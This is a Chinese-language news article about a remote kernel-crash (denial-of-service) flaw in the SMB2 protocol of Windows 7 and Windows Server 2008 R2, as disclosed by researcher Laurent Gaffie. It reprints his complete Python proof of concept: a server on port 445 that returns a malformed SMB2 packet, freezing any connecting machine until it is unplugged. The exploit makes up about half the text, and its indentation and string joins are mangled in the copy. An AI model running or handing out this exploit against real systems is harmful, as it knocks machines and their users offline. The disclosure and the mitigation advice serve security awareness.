微軟昨日證實(shí)，有報(bào)告指出Windows 7和Windows Server 2008 R2中存在一個(gè)漏洞，可被用來進(jìn)行遠(yuǎn)程攻擊系統(tǒng)，并導(dǎo)致系統(tǒng)內(nèi)核崩潰，微軟目前正在就此問題進(jìn)行調(diào)查。

微軟官方發(fā)言人表示，此漏洞為Windows網(wǎng)絡(luò)文件和打印共享協(xié)議Server Message Block（SMB）中存在的拒絕式服務(wù)漏洞，不過迄今為止微軟還沒有發(fā)現(xiàn)利用此漏洞實(shí)施攻擊行為的案例。

安全專家Laurent Gaffie昨日在博客中曝光了這一漏洞，并將其定級為中高級別漏洞，Laurent Gaffie表示這個(gè)漏洞會(huì)導(dǎo)致SMB協(xié)議進(jìn)入無限死循環(huán)，他還進(jìn)行了完整代碼演示。目前還沒有任何修復(fù)該漏洞的補(bǔ)丁，Gaffie建議用戶在微軟發(fā)布相關(guān)補(bǔ)丁前關(guān)閉SMB功能和端口。

Gaffie指出，無論你的防火墻是如何設(shè)置的，黑客都有可能在局域網(wǎng)內(nèi)或是利用IE對你的系統(tǒng)進(jìn)行攻擊。Gaffie表示，該漏洞僅影響Windows 7和Windows Server 2008 R2，并不對其它系統(tǒng)造成影響。

附代碼演示：

　　#win7-crash.py:

　　#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)

　　#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.

　　#NO BSOD, YOU GOTTA PULL THE PLUG.

　　#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash

　　#Author: Laurent Gaffié

　　#

　　import SocketServer

　　packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..

　　"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"

　　"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

　　"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

　　"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

　　"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"

　　"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"

　　"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"

　　"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"

　　"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"

　　"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

　　class SMB2(SocketServer.BaseRequestHandler):

　　def handle(self):

　　print "Who:", self.client_address

　　print "THANKS SDL"

　　input = self.request.recv(1024)

　　self.request.send(packet)

　　self.request.close()

　　launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445

　　launch.serve_forever()

【編輯推薦】

1. 微軟2009年11月安全公告發(fā)布 6個(gè)補(bǔ)丁15個(gè)漏洞
2. 2009年世界頂級殺毒軟件排行(ToptenReviews)
3. 德國信息安全部門警告網(wǎng)民不要使用Chrome上網(wǎng)
4. 360殺毒一舉超越卡巴斯基?
5. 趨勢科技發(fā)文挑釁VB100 金山對此不以為然
6. 趨勢退出VB100病毒測試 強(qiáng)調(diào)評測與病毒的不對等博弈
7. 趨勢科技：云安全是安全領(lǐng)域的一場工業(yè)革命
8. 51CTO云安全專題頁